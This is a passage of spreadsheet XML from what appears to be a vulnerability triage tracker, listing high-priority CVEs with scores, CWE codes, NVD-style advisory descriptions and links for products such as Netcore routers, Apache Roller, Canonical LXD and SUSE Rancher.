      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Netcore NR289-GE 1.4.5102. This affects the function system of the file /set_ntp_server_ip.cgi of the component CGI Handler. The manipulation of the argument ntp_ip results in os command injection. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101076</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101077</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Netcore NR289-GE 1.4.5102. This impacts the function process_request of the component boa_temp Handler. This manipulation causes missing authentication. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101077</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102240</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Netcore NAP930 0.1.241010.141410. This affects the function eval of the file /www/cgi-bin/network_tools of the component Network Tools CGI. The manipulation of the argument sid results in os command injection. The attack may be performed from remote. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102240</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101037</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in FAST FAC1200R 5.0_20201119_1.0.2. Affected is the function parse_advertisement_frame of the component devdiscover Service. The manipulation results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101037</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101038</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in FAST FAC1200R 5.0_20201119_1.0.2. Affected by this vulnerability is the function MmtAtePrase of the component MmtAtePrase Parser. This manipulation causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101038</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82377</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization in Apache Roller 6.1.5 allows an authenticated user to read, modify, or delete weblog content belonging to other weblogs through the legacy XML-RPC Blogger and MetaWeblog APIs, because the handlers authenticate the caller but do not verify the caller's permission on the weblog or entry actually affected. Only installations that enable the non-default global XML-RPC setting are affected; the per-weblog API flag defaults to enabled for UI-created weblogs. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which applies an explicit per-method permission check, or to keep the XML-RPC feature disabled.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82377</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85526</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>Path traversal in the Btrfs storage driver (unpackVolume) in Canonical LXD on Linux allows an authenticated user with instance creation privileges to delete or replace arbitrary files and directories on the host filesystem as root via a crafted subvolumes[].path entry in backup/optimized_header.yaml during a btrfs optimized backup import.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85526</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87799</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution in the migration receive path in Canonical LXD versions 4.0 and later (fixed in 4.0.14, 5.0.10, 5.21.8 and 6.10) on Linux allows an authenticated client that can create instances or custom storage volumes in a project, or a malicious migration source server, to write attacker-controlled files to arbitrary paths on the target host as root, leading to full host compromise. The attacker does this with a crafted rsync or btrfs send stream that plants a symlink in the transferred volume, such as rootfs or root.img, and then writes through it.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87799</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82384</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>requests, rust</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>Deserialization of Untrusted Data in Apache Roller 6.1.5 allows an unauthenticated remote attacker to cause deserialization of attacker-controlled bytes, because the XML-RPC endpoint accepts vendor extension types that are deserialized during request parsing, before authentication. The servlet is mapped unconditionally, so parsing occurs even when the global XML-RPC feature is set to disabled; no non-default configuration is required for this path. This can lead to remote code execution. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which disables the extension types and rejects requests when the XML-RPC feature is disabled.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82384</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90924</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Use of default credentials vulnerability in Innotim Software, Telecommunications and Consultancy Trade Ltd. Co. Logsign SIEM allows Try Common or Default Usernames and Passwords.
This issue affects Logsign SIEM: from 6.4.101 before 6.4.117.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90924</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101354</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in FAST FAC1203R 20200116_2.0.4. The affected element is the function _tWlanTask of the component MmtAtePrase Parser. Performing a manipulation results in stack-based buffer overflow. The attacker must have access to the local network to execute the attack. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101354</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12342</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>psirt@sailpoint.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>This vulnerability
impacts all versions of IdentityIQ and allows an unauthenticated user remote
code execution on the IdentityIQ server due to improper input validation of
submitted web service API content.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12342</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85185</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Path traversal in the btrfs storage driver in Canonical LXD versions 4.0.2 and later (fixed in 4.0.14, 5.0.10, 5.21.8 and 6.10) on Linux allows an authenticated client with permission to create instances in a project to delete arbitrary files on the host as root. On hosts whose root filesystem is btrfs, the client can also place attacker-controlled content at arbitrary host paths, leading to full host compromise. The client does this with a crafted subvolume path containing ../ sequences, sent in either of two ways: in the optimized_header.yaml of an optimized btrfs backup, or in the btrfs migration header sent by a malicious migration source.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85185</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88804</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated update of public UI settings could be used by remote attackers to execute a stored cross-site scripting attack in the Rancher UI, in SUSE Rancher 2.15 before 2.15.2, 2.14 before 2.14.6, 2.13 before 2.13.10, 2.12 before 2.12.14 and 2.11 before 2.11.18.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88804</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19759</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>An Incorrect Authorization vulnerability in the task configuration in Google Cloud Application Integration versions prior to 2026-06-17 on Google Cloud Platform allows an authenticated Google Cloud user to execute arbitrary internal RPCs from inside Google's production network under a privileged identity using an internal-only task type.
This vulnerability was patched on 17 June 2026, and no customer action is needed.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19759</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81867</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in the JavaScript Task in Google Cloud Application Integration versions prior to 2026-06-28 on Google Cloud Platform allows an authenticated user with standard permissions to run arbitrary code on the shared production servers using a specially crafted script bypassing param guards.
This vulnerability was patched on 28 June 2026, and no customer action is needed.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81867</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100752</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
